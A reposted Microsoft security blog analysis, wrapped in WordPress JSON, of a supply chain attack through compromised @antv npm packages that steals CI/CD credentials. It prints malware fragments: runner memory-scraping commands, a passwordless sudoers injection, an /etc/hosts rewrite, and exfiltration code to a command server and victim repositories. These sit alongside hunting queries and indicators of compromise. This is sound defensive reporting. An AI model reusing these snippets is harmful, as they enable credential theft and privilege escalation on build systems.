{"id":55895,"date":"2026-05-20T14:41:29","date_gmt":"2026-05-20T14:41:29","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=55895"},"modified":"2026-05-20T14:41:29","modified_gmt":"2026-05-20T14:41:29","slug":"mini-shai-hulud-compromised-antv-npm-packages-enable-cicd-credential-theft","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=55895","title":{"rendered":"Mini Shai Hulud: Compromised @antv npm packages enable CI\/CD credential theft_MSSECURE:6D00E966D9372364C645950D0C2319E5"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-20T19:28:40&#8243;,&#8221;description&#8221;:&#8221;Microsoft has identified an active supply chain attack targeting the _@antv_ node package manager (npm) package ecosystem. A threat actor compromised an _@antv_ maintainer account and published malicious versions of widely used data-visualization packages, resulting in cascading downstream impact.\\n\\nThe compromise propagated through dependency chains into libraries like _echarts-for-react_(which has more than 1 million weekly downloads), expanding the blast radius into CI\/CD pipelines and cloud workloads across the ecosystem. The malicious payload\u2014a ~499 KB obfuscated JavaScript file\u2014runs silently during npm install and is purpose-built to steal credentials from GitHub Actions environments.\\n\\nKey capabilities observed in the payload include multi-platform credential theft (GitHub, Amazon Web Services, HashiCorp Vault, npm, Kubernetes, 1Password), GitHub Action Runner process memory scraping, privilege escalation, dual-channel data exfiltration, and Supply chain Levels for Software Artifacts (SLSA) provenance forgery. 
These capabilities suggest a deliberate effort to evade analysis and an apparent focus on CI\/CD environments.\\n\\nThe authors of the antv account have also since confirmed in a ticket on the repo that the situation is now resolved.\\n\\n## Attack chain overview\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-104-1024&#215;683.webp)Figure 1. @antv npm supply chain attack flow.\\n\\nThe _@antv_ organization maintains charting libraries (G2, G6) embedded across dashboards and applications. The attack proceeds through:\\n\\n  * Maintainer account compromise and publication of malicious _@antv_ package versions\\n  * Downstream dependency amplification (_echarts-for-react_ , _size-sensor_ , and others)\\n  * Automatic payload execution through a preinstall hook during npm install\\n  * Execution chain: node \u2192 shell \u2192 bun \u2192 payload (Bun runtime installed if absent)\\n\\n\\n\\n### Technical analysis\\n\\nThe payload replaces the legitimate index.js with a single-line obfuscated script.\\n\\n#### Obfuscation\\n\\n  * **Layer 1:** 1,732 Base64-encoded strings in a rotated array, decoded through lookup function with the shuffle key 0xa31de\\n  * **Layer 2:** Critical strings such as command-and-control (C2) domain and env var names are encrypted with a custom PBKDF2 and SHA-256 cipher, which is decrypted at runtime.\\n  * **Environment gating:** The payload exits immediately if it\u2019s not running on GitHub Actions on Linux\\n  * **Branch avoidance:** Skips the _main_ , _master_ , _dependabot\/_ , _renovate\/_ , and _gh-pages_ when using Git API exfiltration\\n\\n\\n    \\n    \\n    \/\/ Layer 1: 1,732 strings in rotated array with base64 decode\\n    (function(_0x44be0e, _0x3ff020){\\n        \/\/ Array shuffle IIFE with key 0xa31de\\n        _0x335af4[&#8216;push&#8217;](_0x335af4[&#8216;shift&#8217;]());\\n    })(_0x71ec, 0xa31de));\\n     \\n    \/\/ Layer 2: PBKDF2+SHA256 runtime decryption for 
critical strings\\n    var e6 = \\&#8221;a8269c01069452afb8a54de904e6419578d155fdbdb9e566bab8576a4266b61e\\&#8221;;\\n    var t6 = \\&#8221;7f44e4ba6f6a71bd0f789e7f83bd3104\\&#8221;;\\n    var u5 = new du(e6, t6);  \/\/ PBKDF2 cipher instance\\n    globalThis[\\&#8221;f2959c600\\&#8221;] = function(s) { return u5.decode(s); };\\n     \\n    \/\/ Environment gate &#8211; exits if not GitHub Actions on Linux\\n    this[&#8216;isGitHubActions&#8217;] = process.env[f2959c600(&#8217;68zz23c6NGR9&#8230;&#8217;)]  === &#8216;true&#8217;;\\n    this[&#8216;isLinuxRunner&#8217;]   = process.env[f2959c600(&#8216;NhUrwwYEwYIJ&#8230;&#8217;)] === &#8216;Linux&#8217;;\\n    \\n\\n#### Credential theft\\n\\nThe payload targets secrets across six platforms:\\n\\n  * **GitHub** : Extracts _GITHUB_TOKEN_ , scans for Personal Access Tokens (_gh[op]__) and installation tokens (_ghs__), validates through _\/user_ API, and enumerates repo and org secrets.\\n  * **Amazon Web Services(AWS)** : Queries Instance Metadata Service (169.254.169[.]254), Elastic Container Service metadata (169.254.170[.]2), reads _.aws\/_ files, harvests env vars, and then calls SecretsManager across all regions.\\n  * **HashiCorp Vault** : Searches 12+ token paths (_\/var\/run\/secrets\/vault\/token_ , _~\/.vault-token_ , and others) and connects to a local Vault at 127.0.0[.]1:8200.\\n  * **npm** : Validates tokens using _\/-\/whoami_ , exchanges OpenID Connect (OIDC) tokens for publish access, and enumerates packages\\n  * **Kubernetes** : Reads service account tokens and enumerates namespace secrets\\n  * **1Password** : Interacts with command-line interface (CLI) and attempts master password extraction with two-factor authentication (2FA) bypass\\n\\n\\n    \\n    \\n    \/\/ AWS Secrets Manager enumeration\\n    &#8216;secretsmanager:ListSecrets&#8217;\\n    &#8216;secretsmanager:GetSecretValue(&#8216;\\n     \\n    \/\/ Vault token paths searched (12+ locations)\\n    
&#8216;\/var\/run\/secrets\/vault\/token&#8217;\\n    &#8216;\/.vault-token&#8217;\\n    &#8216;\/home\/runner\/.vault-token&#8217;\\n    &#8216;\/root\/.vault-token&#8217;\\n    &#8216;\/etc\/vault\/token&#8217;\\n     \\n    \/\/ GitHub API secret enumeration\\n    &#8216;\/actions\/secrets?per_page=100&#8217;\\n    &#8216;\/actions\/organization-secrets?per_page=100&#8217;\\n    \\n\\n#### Runner memory scraping\\n\\nThe payload locates the GitHub Actions Runner.Worker PID using \/proc scanning, then extracts runtime secrets using the following:\\n    \\n    \\n    \/\/ Locates Runner.Worker PID via \/proc\\n    &#8216;findRunnerWorkerPIDLinux&#8217;\\n    \/\/ Scans \/proc\/\/cmdline for \\&#8221;Runner.Worker\\&#8221;\\n     \\n    \/\/ Extracts secrets from process memory\\n    tr -d &#8216;\\\\0&#8217; | grep -aoE &#8216;\\&#8221;[^\\&#8221;]+\\&#8221;:{\\&#8221;value\\&#8221;:\\&#8221;[^\\&#8221;]*\\&#8221;,\\&#8221;isSecret\\&#8221;:true}&#8217; | sort -u\\n    \\n\\nThis activity bypasses normal secret masking by reading secrets directly from runner process memory.\\n\\n#### Privilege escalation\\n\\n  * Injects sudoers rule through bind mount: _echo &#8216;runner ALL=(ALL) NOPASSWD:ALL&#8217; \\u003e \/mnt\/runner_\\n  * Modifies _\/etc\/hosts_ for DNS redirection\\n\\n\\n    \\n    \\n    \/\/ Injects passwordless sudo via \/etc\/sudoers.d bind mount at \/mnt\\n    echo &#8216;runner ALL=(ALL) NOPASSWD:ALL&#8217; \\u003e \\n     \\u0026\\u0026 chmod 0440 \/mnt\/runner\\n     \\n    \/\/ DNS manipulation\\n    sudo sh -c \\&#8221;echo &#8216;127.0.0.1 &#8216; \\u003e\\u003e \/etc\/hosts\\&#8221;\\n     \\n    \/\/ Validates sudo access before operations\\n    sudo -n true\\n    \\n\\n#### Exfiltration\\n\\nDual-channel exfiltration:\\n\\n  * **Primary:** HTTPS to encrypted C2 domain (port 443) with DNS pre-check and health probe\\n  * **Fallback:** Git Data API \u2014 Creates blobs, trees, or commits in victim repositories on non-protected branches\\n  * 
**Tertiary:** Creates public repos under victim accounts with reversed description (\\&#8221;niagA oG eW ereH :duluH-iahS\\&#8221;); more than 2,200 of these repos have been observed as of this writing\\n\\n\\n    \\n    \\n    \/\/ Primary: HTTPS C2 with encrypted domain (port 443)\\n    let config = {\\n        &#8216;domain&#8217;: f2959c600(&#8216;bXVunP4+izfR\/cOx8zhW\/fw8v6xFc4cvjYgGdbEE&#8217;),\\n        &#8216;port&#8217;: 0x1bb,  \/\/ 443\\n        &#8216;path&#8217;: f2959c600(&#8216;5WA4NOQUD\/n\/mNx\/cqL4gSVQrTrwV+RBKO7TXeTIk3fFBUt+2arGDjc=&#8217;),\\n        &#8216;dry_run&#8217;: false\\n    };\\n     \\n    \/\/ Fallback: Git Data API &#8211; creates blobs\/trees\/commits in victim repos\\n    await j(token, &#8216;\/repos\/&#8217; + owner + &#8216;\/&#8217; + repo + &#8216;\/git\/blobs&#8217;,\\n            {&#8216;method&#8217;: &#8216;POST&#8217;, &#8216;body&#8217;: JSON.stringify(stolen_data)});\\n    &#8216;\/git\/trees&#8217;\\n    &#8216;\/git\/commits&#8217;\\n     \\n    \/\/ Branch filter &#8211; avoids protected branches to evade detection\\n    Dw = [&#8216;dependabot\/&#8217;, &#8216;renovate\/&#8217;, &#8216;gh-pages&#8217;, &#8216;docs\/&#8217;,\\n          &#8216;copilot\/&#8217;, &#8216;master&#8217;, &#8216;main&#8217;];\\n    \\n\\n#### Propagation and persistence\\n\\n  * Enumerates _\/user\/repos_ and _\/user\/orgs_ to spread into additional repositories\\n  * Installs Bun runtime, executes second-stage payload using _bun run .claude\/_\\n  * Deploys token monitor for ongoing credential capture\\n  * Forges SLSA provenance attestations through Sigstore (Fulcio or Rekor) to appear legitimate\\n\\n\\n\\n#### Impact and blast radius\\n\\n  * Direct compromise of _@antv_ packages with broad ecosystem adoption\\n  * Amplification through downstream dependencies into thousands of projects\\n  * Cascading risk: stolen npm tokens enable further package poisoning, stolen GitHub tokens enable repo manipulation, and stolen AWS credentials 
enable cloud access\\n  * SLSA provenance forgery erodes trust in supply chain attestation frameworks\\n\\n\\n\\n### How GitHub took action to prevent further harm\\n\\nUpon learning of the attack, GitHub acted immediately to limit further damage. It removed 640 malicious packages and invalidated 61,274 npm granular access tokens with write permissions and 2FA bypass, preventing leaked tokens from being used in this or similar attacks. GitHub also published advisories relevant to this malware campaign in the GitHub Advisory Database and alerted the community through Dependabot alerts and npm audit. It continues to monitor for additional affected packages and remove them as needed.\\n\\n## Mitigation and protection guidance\\n\\nMicrosoft recommends the following mitigations to reduce the impact of this threat:\\n\\n  * Review dependency trees for direct or transitive usage of affected _@antv\/_ packages.\\n  * Identify systems that installed or built affected package versions during the suspected exposure window.\\n  * Pin known-good package versions where possible and avoid automatic dependency upgrades until validation is complete.\\n  * Disable pre- and post-installation script execution by ensuring you run npm install with `--ignore-scripts`.\\n  * While the GitHub team has already invalidated all the npm tokens that had write access and 2FA bypass, Microsoft Defender still recommends rotating credentials, tokens, npm access tokens, CI\/CD secrets, and cloud credentials that might have been exposed in affected build or developer environments.\\n  * Rotate credentials, tokens, npm access tokens, CI\/CD secrets, and cloud credentials that might have been exposed in affected build or developer environments.\\n  * Audit organization and personal GitHub accounts for public repositories with the description \u201cniagA oG eW ereH :duluH-iahS\u201d or other unexpected repositories created during the exposure window, and revoke any GitHub tokens that might 
have been implicated.\\n  * Audit CI\/CD logs for unexpected outbound network connections, script execution, or suspicious package lifecycle activity.\\n  * Review npm package lockfiles, build logs, and artifact provenance for evidence of compromised package versions.\\n  * Enable cloud-delivered protection in Microsoft Defender Antivirus or equivalent antivirus protection.\\n  * Use Microsoft Defender XDR to investigate suspicious activity across endpoints, identities, cloud apps, and developer environments.\\n  * Use Microsoft Defender Vulnerability Management to search for antv packages across your estate.\\n\\n\\n\\n### Microsoft Defender XDR Detections\\n\\nMicrosoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.\\n\\nCustomers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.\\n\\n**Tactic**| **Observed activity**| **Microsoft Defender coverage**  \\n&#8212;|&#8212;|&#8212;  \\nExecution | Suspicious script execution during npm install or package lifecycle activity| **Microsoft Defender Antivirus**   \\n- Trojan:AIGen\/NPMStealer   \\n- Backdoor:Python\/ShaiWorm   \\n- Trojan:JS\/ShaiWorm   \\n- Trojan:JS\/ObfusNpmJs   \\n  \\n**Microsoft Defender for Endpoint**   \\n- Suspicious usage of Bun runtime   \\n- Suspicious Installation of Bun runtime   \\n- Suspicious _Node.js_ process behavior   \\nCredential Access| Potential harvesting of environment variables, tokens, or developer secrets| **Microsoft Defender for Endpoint**   \\n- Credential access attempt   \\n- Suspicious cloud credential access by npm-cached binary   \\n- Kubernetes secrets enumeration 
indicative of credential access  \\n  \\n**Microsoft Defender for Cloud**   \\nSha1-Hulud Campaign Detected: Possible command injection to exfiltrate credentials  \\nCommand and Control| Potential outbound connections from build systems or developer machines| **Microsoft Defender for Endpoint**   \\nConnection to a custom network indicator  \\n  \\n* * *\\n\\n# Microsoft Security Copilot\\n\\nSecurity Copilot customers can use the standalone experience to create their own prompts or run prebuilt promptbooks to automate incident response or investigation tasks related to this threat, including:\\n\\n  * Incident investigation\\n  * Microsoft user analysis\\n  * Threat Intelligence 360 report based on MDTI article\\n  * Vulnerability or supply chain impact assessment\\n\\n\\n\\nNote that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.\\n\\n### **Microsoft Defender XDR Threat analytics**\\n\\nhttps:\/\/security.microsoft.com\/threatanalytics3\/5879a0e7-f145-407b-bc84-1ae405a016ea\/overview\\n\\n### Advanced hunting\\n\\nThe following sample queries let you search for a week&#8217;s worth of events. 
To explore up to 30 days of raw data, go to the Advanced Hunting page \\u003e Query tab, and update the time range to Last 30 days.\\n\\n**Hunt for suspicious npm lifecycle script execution**\\n\\nThis query searches for _Node.js_ and npm activity involving install lifecycle behavior and relevant package references.\\n    \\n    \\n    DeviceProcessEvents\\n    | where FileName in~ (\\&#8221;node.exe\\&#8221;, \\&#8221;npm.cmd\\&#8221;, \\&#8221;npm.exe\\&#8221;, \\&#8221;npx.cmd\\&#8221;, \\&#8221;npx.exe\\&#8221;)\\n    | where ProcessCommandLine has_any (\\&#8221;preinstall\\&#8221;, \\&#8221;postinstall\\&#8221;, \\&#8221;install\\&#8221;)\\n    | where ProcessCommandLine has_any (\\&#8221;@antv\\&#8221;, \\&#8221;echarts-for-react\\&#8221;)\\n    | project Timestamp, DeviceName, FileName, ProcessCommandLine,\\n              InitiatingProcessFileName, InitiatingProcessCommandLine,\\n              AccountName\\n    \\n\\n**Hunt for potential compromise through malicious npm packages**\\n    \\n    \\n    DeviceProcessEvents\\n    | where Timestamp \\u003e ago(2d)\\n    | where FileName in (\\&#8221;bun\\&#8221;, \\&#8221;bun.exe\\&#8221;)\\n    | where ProcessCommandLine has \\&#8221;run index.js\\&#8221;\\n    \\n\\n**Hunt for affected dependencies in your software inventory**\\n    \\n    \\n    DeviceTvmSoftwareInventory\\n    | where SoftwareName has \\&#8221;antv\\&#8221; or SoftwareVendor has \\&#8221;antv\\&#8221;\\n    | project DeviceName, OSPlatform, SoftwareVendor, SoftwareName, SoftwareVersion\\n    \\n\\n**Hunt for suspicious outbound connection from Python backdoor**\\n    \\n    \\n    DeviceNetworkEvents\\n    | where Timestamp \\u003e ago(2d)\\n    | where InitiatingProcessFileName startswith \\&#8221;python\\&#8221;\\n    | where InitiatingProcessCommandLine has \\&#8221;\/cat.py\\&#8221;\\n    \\n\\n**Hunt for suspicious outbound activity from Node.js processes**\\n\\nSearches for network connections initiated by Node.js or npm 
processes that reference package-related paths or commands.\\n    \\n    \\n    DeviceNetworkEvents\\n    | where InitiatingProcessFileName in~ (\\&#8221;node.exe\\&#8221;, \\&#8221;npm.exe\\&#8221;, \\&#8221;npx.exe\\&#8221;)\\n    | where InitiatingProcessCommandLine has_any (\\&#8221;@antv\\&#8221;, \\&#8221;echarts-for-react\\&#8221;, \\&#8221;node_modules\\&#8221;)\\n    | project Timestamp, DeviceName, RemoteUrl, RemoteIP,\\n              InitiatingProcessFileName, InitiatingProcessCommandLine,\\n              AccountName\\n    \\n\\n**Hunt for affected dependency references in developer directories**\\n\\nThis query searches for package manifest or lockfile activity that might contain relevant dependency references.\\n    \\n    \\n    DeviceFileEvents\\n    | where FileName in~ (\\&#8221;package.json\\&#8221;, \\&#8221;package-lock.json\\&#8221;, \\&#8221;yarn.lock\\&#8221;, \\&#8221;pnpm-lock.yaml\\&#8221;)\\n    | where FolderPath has_any (\\&#8221;node_modules\\&#8221;, \\&#8221;src\\&#8221;, \\&#8221;repo\\&#8221;, \\&#8221;workspace\\&#8221;)\\n    | where AdditionalFields has_any (\\&#8221;@antv\\&#8221;, \\&#8221;echarts-for-react\\&#8221;)\\n    | project Timestamp, DeviceName, FolderPath, FileName,\\n              InitiatingProcessFileName, InitiatingProcessCommandLine\\n    \\n\\n**Hunt for post-compromise C2 activity**\\n    \\n    \\n    DeviceNetworkEvents\\n    | where Timestamp \\u003e ago(2d)\\n    | where RemoteUrl has \\&#8221;t.m-kosche.com\\&#8221;\\n    \\n\\n**Shai-Hulud npm supply-chain indicator observed inside a Kubernetes container**\\n    \\n    \\n    CloudProcessEvents\\n    | where ProcessCommandLine has_any (\\&#8221;IfYouInvalidateThisTokenItWillNukeTheComputerOfTheOwner\\&#8221;, \\&#8221;niagA oG eW ereH\\&#8221;, \\&#8221;:duluH-iahS\\&#8221;, \\&#8221;t.m-kosche.com\\&#8221;, \\&#8221;7cb42f57561c321ecb09b4552802ae0ac55b3a7a\\&#8221;, \\&#8221;@antv\/setup\\&#8221;)\\n    | project Timestamp, AzureResourceId, 
KubernetesPodName, KubernetesNamespace, ContainerName, ContainerId, ContainerImageName, ProcessName, ProcessCommandLine, ProcessCurrentWorkingDirectory, ParentProcessName, ProcessId, ParentProcessId, AccountName\\n    \\n\\n### Indicators of Compromise (IOC)\\n\\n**Indicator**| **Type**| **Description**  \\n&#8212;|&#8212;|&#8212;  \\n@antv \u2013 whole account| Package scope|   All packages maintained by the antv account were compromised.  \\n  \\nAs per the latest statement from the account authors, this situation is now resolved.  \\necharts-for-react| Package name|   One of the major downstream packages impacted by the antv compromise.  \\nAs per the latest statement from the repository authors, this situation is now resolved.  \\na68dd1e6a6e35ec3771e1f94fe796f55dfe65a2b94560516ff4ac189390dfa1c| SHA-256| Malicious payload JavaScript file  \\nfb5c97557230a27460fdab01fafcfabeaa49590bafd5b6ef30501aa9e0a51142| SHA-256| Malicious backdoor Python script  \\nt.m-kosche[.]com:443| Domain| Infrastructure associated with campaign  \\nIndex.js| File name| Malicious script or dropped file  \\ncat.py| File name| Malicious script or dropped file  \\n  \\n* * *\\n\\n## References\\n\\n  * Mini Shai-Hulud Hits @antv Ecosystem, 639 Compromised npm Package Versions\\n\\n\\n\\n_This research is provided by Microsoft Defender Security Research with contributions from Rahul Mohandas, Sumith Maniath, Ahmed Saleem Kasmani, Arvind Gowda, Sagar Patil, and members of Microsoft Threat Intelligence._\\n\\n## Learn more\\n\\nFor the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.\\n\\nTo get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.\\n\\nTo hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence 
podcast.\\n\\nReview our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.  \\n\\n  * How Microsoft discovers and mitigates evolving attacks against AI guardrails \\n  * Learn more about securing Copilot Studio agents with Microsoft Defender  \\n  * Evaluate your AI readiness with our latest Zero Trust for AI workshop.\\n  * Learn more about Protect your agents in real-time during runtime (Preview)\\n  * Explore how to build and customize agents with Copilot Studio Agent Builder \\n  * Microsoft 365 Copilot AI security documentation \\n\\n\\n\\nThe post Mini Shai Hulud: Compromised @antv npm packages enable CI\/CD credential theft appeared first on Microsoft Security Blog.&#8221;,&#8221;published&#8221;:&#8221;2026-05-20T17:48:44&#8243;,&#8221;modified&#8221;:&#8221;2026-05-20T17:48:44&#8243;,&#8221;type&#8221;:&#8221;mssecure&#8221;,&#8221;title&#8221;:&#8221;Mini Shai Hulud: Compromised @antv npm packages enable CI\/CD credential 
theft&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSSECURE:6D00E966D9372364C645950D0C2319E5&#8243;,&#8221;bulletinFamily&#8221;:&#8221;blog&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;&#8221;,&#8221;sourceHref&#8221;:&#8221;&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/05\/20\/mini-shai-hulud-compromised-antv-npm-packages-enable-ci-cd-credential-theft\/&#8221;,&#8221;category_name&#8221;:&#8221;News&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#822
1;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-20T19:28:40&#8243;,&#8221;description&#8221;:&#8221;Microsoft has identified an active supply chain attack targeting the _@antv_ node package manager (npm) package ecosystem. A threat actor compromised an _@antv_ maintainer account&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,110,13,33,7,11,5],"class_list":["post-55895","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-mssecure","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Mini Shai Hulud: Compromised @antv npm packages enable CI\/CD credential theft_MSSECURE:6D00E966D9372364C645950D0C2319E5 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=55895\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Mini Shai Hulud: Compromised @antv npm packages enable CI\/CD credential theft_MSSECURE:6D00E966D9372364C645950D0C2319E5 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-05-20T19:28:40&#8243;,&#8221;description&#8221;:&#8221;Microsoft has identified an active supply chain attack targeting the _@antv_ node package manager (npm) package ecosystem. 
A threat actor compromised an _@antv_ maintainer account...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=55895\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-20T14:41:29+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"14 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=55895#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=55895\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Mini Shai Hulud: Compromised @antv npm packages enable CI\\\/CD credential theft_MSSECURE:6D00E966D9372364C645950D0C2319E5\",\"datePublished\":\"2026-05-20T14:41:29+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=55895\"},\"wordCount\":2742,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"mssecure\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_news\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=55895#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=55895\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=55895\",\"name\":\"Mini Shai Hulud: Compromised @antv npm packages enable CI\\\/CD credential 
theft_MSSECURE:6D00E966D9372364C645950D0C2319E5 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-20T14:41:29+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=55895#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=55895\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=55895#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Mini Shai Hulud: Compromised @antv npm packages enable CI\\\/CD credential theft_MSSECURE:6D00E966D9372364C645950D0C2319E5\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero 
redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Mini Shai Hulud: Compromised @antv npm packages enable CI\/CD credential 